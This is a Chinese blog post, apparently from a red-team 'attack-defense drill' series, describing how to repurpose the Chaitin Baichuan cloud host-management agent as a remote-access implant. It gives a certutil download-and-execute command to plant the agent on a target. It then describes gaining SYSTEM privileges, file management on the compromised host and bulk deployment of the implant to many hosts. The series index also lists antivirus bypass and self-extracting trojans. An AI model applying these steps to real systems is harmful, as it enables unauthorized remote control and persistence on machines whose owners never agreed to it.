合集 – 逸尘-实战攻防演练(5)
1.实战攻防演练–利用微软自带Certutil命令ByPassAV上传C22023-10-202.实战攻防演练-利用Everything搜索软件进行内网后渗透利用2023-10-213.实战攻防演练-WinRar压缩包创建自解压木马2023-10-17
4.实战攻防演练-利用长亭百川云平台上线远控提权2023-10-245.实战攻防演练-Linux写入ssh密钥，利用密钥登录2023-10-30

收起

前言

长亭百川云平台是北京长亭未来科技有限公司旗下的 SaaS 产品服务平台，专注于云安全解决方案。其提供牧云·主机管理助手、网站监测、牧云·云原生安全平台、雷池 Web 应用防火墙等一系列在线安全产品，帮助企业用户更轻松地治理云安全问题，使云上业务更加安全可靠。在使用中发现该产品可以用于攻防对抗中实战，其生成的客户端可是远程上线，获取到服务器主机任意权限，最后会提升至系统权限，适用于后渗透权限提升维持。

实战演示

网站地址:https://rivers.chaitin.cn
在开始使用长亭百川云服务之前，需要先注册一个百川云账号。有账号后可以在百川云登录

选择进入工作台，选择牧云主机管理助手

其中这里区分三个版本，基础版，体验版，付费版，具体如下所示，掏钱的肯定比不掏好用，看个人情况选择。

Windows上线木马

这里如下所示，windows主机需要浏览器下载后，使用其他命令运行

这里首先下载木马文件后上传至自己的网站服务器，使用certutil命令下载执行
certutil -urlcache -split -f http://127.0.0.1/installer.exe c:installer.exe && start installer.exe
或者直接上传目标服务器运行 start installer.exe

服务端就会上线

配置信息

这里可以对上线主机进行查看基础配置，和文件管理操作

权限提升

如下，我们使用Administrator权限上线执行，牧云管理助手直接获取到系统权限，省去权限提升步骤

Linux上线木马

配置入上一致，linux直接复制命令后，在目标主机执行，详细操作类似于windows操作

详细配置

其他功能

可以执行管理查看docker服务

安全扫描功能可以检测主机漏洞风险，及常见漏洞等

应用市场可以下载各种软件

统一配置

推送命令模块可以对多主机群进行批量上线木马

批量命令执行